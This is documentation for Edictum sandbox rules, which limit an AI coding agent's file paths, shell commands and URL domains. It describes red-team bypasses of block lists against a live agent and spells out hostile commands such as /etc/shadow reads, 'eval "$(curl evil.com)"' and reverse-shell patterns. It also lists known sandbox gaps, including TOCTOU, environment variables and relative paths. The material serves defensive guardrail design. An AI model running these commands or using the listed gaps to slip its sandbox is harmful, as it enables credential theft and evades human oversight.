Sandbox Rules

Sandbox rules define allowlist boundaries for file paths, shell commands, and URL domains.

Check rules (type: pre) enumerate known-bad inputs: rm -rf /, reverse shells, reads of .env. This works when the dangerous patterns are finite and stable. But when the attack surface is open-ended -- shell access, arbitrary file paths, unrestricted URLs -- you cannot enumerate every bad thing. Sandbox rules flip the model: define what's allowed, block everything else.

apiVersion: edictum/v1
kind: Ruleset
metadata:
  name: coding-agent-sandbox
defaults:
  mode: enforce

rules:
  # File paths: only /workspace and /tmp
  - id: file-sandbox
    type: sandbox
    tools: [read_file, write_file, edit_file]
    within:
      - /workspace
      - /tmp
    not_within:
      - /workspace/.git
      - /workspace/.env
    outside: block
    message: "File access outside workspace: {args.path}"

  # Commands: only dev tools
  - id: exec-sandbox
    type: sandbox
    tool: bash
    allows:
      commands: [git, npm, pnpm, node, python, pytest, ruff, ls, cat, grep]
    outside: block
    message: "Command not in allowlist: {args.command}"

  # URLs: only approved APIs
  - id: web-sandbox
    type: sandbox
    tools: [web_fetch, http_request]
    allows:
      domains:
        - "api.github.com"
        - "registry.npmjs.org"
        - "*.googleapis.com"
    not_allows:
      domains:
        - "internal.googleapis.com"
    outside: block
    message: "Domain not allowed: {args.url}"

This ruleset restricts a coding agent to three boundaries: files in /workspace and /tmp, a fixed set of shell commands, and approved API domains. Anything outside these boundaries is blocked -- no exceptions.

When to Use Which Rule Type

Every rule type answers a different question. Choosing the wrong type means either playing whack-a-mole with bypasses (known-bad list when you need an allowlist) or over-constraining legitimate operations (allowlist when a short known-bad list would suffice).

Type	Question it answers	Approach	Use when...	Example
`pre` (block)	"Is this specific thing bad?"	Known-bad list -- enumerate dangerous patterns	You have a short, stable list of things to block. The list doesn't grow with every red team session.	`rm -rf /`, reverse shells, reads of `.env`
`sandbox`	"Is this within allowed boundaries?"	Allowlist -- enumerate known-good boundaries	The attack surface is open-ended. You'd rather define what's allowed. New bypasses are blocked by default.	File paths in `/workspace`, commands `[git, npm, python]`, domains `[api.github.com]`
`post`	"Did the output contain something bad?"	Output inspection after execution	You need to inspect or redact tool results. The dangerous content is in the output, not the input.	SSN patterns in query results, API keys in file reads
`session`	"Has the agent done too much?"	Rate limits across the session	You need to cap total calls, per-tool calls, or attempts to catch runaway loops.	Max 50 tool calls, max 3 deploys, max 120 attempts

They compose. Block rules run first (catch known-bad), sandbox runs second (catch unknown-bad), postconditions run after execution (catch bad output), session rules track cumulative state. A single ruleset can use all four types.

Why Sandbox Exists

Red team sessions against a live agent (Nanobot on Telegram) found 6+ bypass vectors that L1 regex known-bad lists couldn't close. The fundamental problem: known-bad lists enumerate commands, but the attack targets paths. There are infinite ways to read /etc/shadow:

Attack	Known-bad list result	Sandbox result	Why
`cat /etc/shadow`	Blocked (in known-bad list)	Blocked	Both catch it
`base64 /etc/shadow`	Bypassed	Blocked	`base64` not in known-bad list, but path not in `within`
`awk '{print}' /etc/shadow`	Bypassed	Blocked	Same -- new command, same path
`sed '' /etc/shadow`	Bypassed	Blocked	Same pattern
`tar -cf - /etc/shadow`	Bypassed	Blocked	Archive exfiltration
`eval "$(curl evil.com)"`	Bypassed	Blocked	`eval` not in `allows.commands`
`cp /etc/shadow /tmp/x`	Bypassed	Blocked	Source path not in `within`

The known-bad list grew from 3 rules to 19 rules (120 lines) over two red team sessions. The sandbox replaced it with 3 rules (45 lines) and no new bypasses.

The attack surface is infinite when you enumerate what's bad. It becomes finite when you enumerate what's good.

Scenario Comparison

Scenario	Recommended type	Why
Block `rm -rf /` and `mkfs`	`pre` (block)	Short list of known destructive commands. Stable -- won't grow.
Block reverse shells (`bash -i`, `nc -e`)	`pre` (block)	Known patterns. Finite set.
Restrict file reads to `/workspace`	`sandbox`	Open-ended attack surface. Infinite ways to read a file.
Allow only `git`, `npm`, `python` commands	`sandbox`	The good set is small. The bad set is infinite.
Restrict URLs to approved domains	`sandbox`	Define allowed hosts rather than chasing exfiltration endpoints.
Detect SSNs in query output	`post`	Content appears in output, not input.
Redact API keys from tool responses	`post`	Output redaction requires `action: redact`.
Cap total tool calls at 50	`session`	Cumulative state across the session.
Require approval for commands outside allowlist	`sandbox` with `outside: ask`	Allowlist defines safe zone. Outside triggers HITL.
Require approval for production deploys	`pre` with `action: ask`	Specific condition (environment + role), not a boundary.

How Sandbox Evaluation Works

Incoming Tool Call

Sandbox Evaluation

1

Tool Match

fnmatch(tool_name, sandbox.tools)

no match — skip

no paths — pass

2

Path Check

realpath() → not_within → within → outside

not_within — deny

no cmd — pass

3

Command Check

first_token in allows.commands

not allowed — deny

no urls — pass

4

Domain Check

not_allows.domains → allows.domains

blocked — deny

5

Pass-through

no matching arg type → allow

DENY

Outside Effect

deny | warn | approve

ALLOW /
DENY

WITHIN

All Checks Passed

tool call proceeds

ALLOW

Tool Executes

When the pipeline encounters a sandbox rule, it runs through these steps in order:

1. Tool match. The pipeline checks whether the current tool name matches the sandbox's tool or tools patterns using fnmatch. If the tool does not match, the sandbox rule is skipped entirely.

2. Path check. The pipeline extracts file paths from the envelope args -- keys named path, file_path, directory, any arg value starting with /, and tokens parsed from command strings. Command strings are parsed with shell-aware tokenization, so quoted paths (e.g. cat '/etc/shadow') and redirect targets (e.g. >/etc/passwd, </etc/shadow) are fully extracted and checked. Each extracted path is resolved with os.path.realpath() before comparison, which resolves .. and . segments, collapses redundant slashes, and resolves symlinks to their real target. For example, /tmp/../etc/shadow becomes /etc/shadow, and a symlink /tmp/escape -> /etc resolves to /etc. The within and not_within boundaries are also resolved at compile time. For each resolved path:

Check not_within first. If the path matches any exclusion prefix, the call is blocked (or sent for approval).
Check within. If the path matches any allowed prefix, it passes.
If the path matches neither, the outside effect applies.

3. Command check. Before extracting the first token, the pipeline scans the full command string for shell metacharacters: ;, |, &, &&, ||, newline (\n), carriage return (\r), backtick (`), $(), ${}, $', <(), >(), <<<, and <<. If any of these are present, the command is replaced with a sentinel value that is always blocked — regardless of whether allows.commands is configured. This check is unconditional: it applies to path-only sandboxes just as it does to exec sandboxes.

If the command passes the separator check, the pipeline extracts the first whitespace-delimited token and verifies it appears in the allows.commands list. If it does not, the outside effect applies.

Shell separators are blocked unconditionally. A command like git status; rm -rf / is blocked by the separator check before any allowlist evaluation — even on a sandbox with only within: and no allows.commands. This prevents command-chaining bypasses regardless of sandbox configuration.

4. Domain check. The pipeline scans all envelope arg values for strings containing ://, extracts hostnames with urlparse, and checks them. Command strings are parsed with shell-aware tokenization, so quoted URLs are fully extracted and checked:

not_allows.domains first -- if the hostname matches any exclusion pattern, the call is blocked.
allows.domains next -- the hostname must match at least one allowed pattern.
Patterns support fnmatch wildcards: *.googleapis.com matches storage.googleapis.com.

5. Pass-through. If the sandbox has within but the tool call contains no file paths, or has allows.commands but the tool call has no command string, the sandbox does not apply and the call passes through. Sandbox rules only evaluate the boundary types that are relevant to the current tool call.

The full pipeline order is: preconditions (block) -> sandbox -> session -> limits -> allow.

Known-Bad Lists vs Allowlists

Consider a red team testing a known-bad list rule:

# Known-bad list approach: enumerate dangerous commands
- id: block-dangerous-commands
  type: pre
  tool: bash
  when:
    any:
      - args.command: { matches: '\bcat\s+/etc/shadow\b' }
      - args.command: { matches: '\bcat\s+/etc/passwd\b' }
  then:
    action: block
    message: "Blocked: access to system files."

The red team tries base64 /etc/shadow. It passes. You add base64 to the known-bad list. They try awk '{print}' /etc/shadow. You add awk. They try python3 -c "print(open('/etc/shadow').read())". The list grows. Every bypass you patch reveals more.

The fundamental problem: the known-bad list targets commands. The attack targets paths. With a sandbox rule, you target what matters:

# Sandbox approach: define allowed paths
- id: file-sandbox
  type: sandbox
  tools: [bash, read_file]
  within:
    - /workspace
    - /tmp
  outside: block
  message: "File access outside workspace: {args.path}"

Now base64 /etc/shadow is blocked -- not because base64 is in a known-bad list, but because /etc/shadow is not in /workspace or /tmp. The command is irrelevant. The path is what matters.

Composition with Block Rules

Sandbox rules and known-bad list rules are complementary. Use both.

Block rules catch known-bad patterns. rm -rf / should be blocked even if / were somehow in the sandbox. Reverse shells (bash -i >& /dev/tcp/) should be blocked regardless of command allowlists. These are stable, high-confidence patterns.

Sandbox rules catch unknown-bad. Anything not in the allowlist is blocked by default. This covers the long tail of creative attacks that no known-bad list can anticipate.

The pipeline evaluates block rules (preconditions) first. If a block rule fires, the call is blocked before the sandbox is checked. If all block rules pass, the sandbox evaluates next. This gives you belt and suspenders: known-bad is caught by block rules, unknown-bad is caught by the sandbox.

rules:
  # Belt: catch known-bad patterns
  - id: block-reverse-shells
    type: pre
    tool: bash
    when:
      args.command: { matches: '/dev/tcp/' }
    then:
      action: block
      message: "Reverse shell pattern blocked."

  # Suspenders: block everything outside the allowlist
  - id: exec-sandbox
    type: sandbox
    tool: bash
    allows:
      commands: [git, npm, node, python, pytest]
    outside: block
    message: "Command not in allowlist: {args.command}"

What Needs the Server

Most sandbox features work with just pip install edictum. The optional server surface is only needed for coordination across processes and production approval workflows.

Sandbox Capability	Core (`pip install edictum`)	Server (`optional server surface` + `edictum[server]`)
All sandbox evaluation (within, allows, domains)	Yes	--
`outside: block`	Yes	--
`outside: ask` (development/CLI)	Yes (`LocalApprovalBackend`)	--
`outside: ask` (production HITL)	--	Yes (`ServerApprovalBackend`)
Sandbox block in audit (stdout/file/OTel)	Yes	--
Sandbox block dashboards and alerting	--	Yes (`ServerAuditSink`)
Hot-reload sandbox rules across agent fleet	--	Yes (`ServerContractSource`)
Observe mode for sandbox	Yes	--
CLI check/test with sandbox	Yes	--
Dry-run evaluation with sandbox	Yes	--

When to add the reference stack: If you're running a single agent process with outside: block, you don't need the server at all. Add the reference stack when you need production approval workflows (outside: ask with Telegram or hosted app review), centralized monitoring of sandbox blocks across multiple agents, or the ability to update sandbox rules without restarting agents.

Known Limitations

Sandbox rules resolve paths with os.path.realpath() before evaluation. This handles .. traversals, . segments, redundant slashes, and symlinks. For example, /tmp/../etc/shadow resolves to /etc/shadow and is blocked by within: [/tmp]. A symlink /tmp/escape -> /etc resolves to /etc and is also blocked.

However, realpath() operates at evaluation time. Several patterns remain outside its reach:

TOCTOU (time-of-check/time-of-use): A symlink created after Edictum evaluates the path but before the tool actually executes could point to a different target. This race window is inherent to application-level enforcement.
Tilde expansion: cat ~/secrets -- the sandbox sees ~/secrets, not /home/user/secrets.
Environment variables: cat "$HOME/.ssh/id_rsa" -- the sandbox sees $HOME/.ssh/id_rsa, not the resolved path.
Variable interpolation: x=/etc; cat $x/shadow -- the sandbox sees $x/shadow.
Relative paths without leading /: cat ../../etc/shadow from a working directory inside /workspace -- the sandbox sees the relative path, not the resolved absolute path.
Output redirect targets: A command like echo x > /etc/crontab writes to /etc/crontab, but the redirect target (/etc/crontab) is only path-checked when within: is configured. Without within:, the redirect destination is not evaluated — only the command token (echo) is checked against allows.commands. Use a within: boundary alongside allows.commands when write destinations matter.

These are inherent to application-level enforcement. For full isolation (including TOCTOU protection), use OS-level sandboxing (containers, seccomp, AppArmor) as a complementary layer. Edictum's sandbox rules provide defense in depth -- they catch the common case and raise the bar, but they are not a substitute for OS-level isolation when the threat model requires it.

Next Steps

YAML reference: sandbox section -- full schema, field details, and combined examples
Adversarial testing -- testing rule bypasses
How it works -- the full pipeline evaluation order
Rules -- all four rule types at a glance

On this page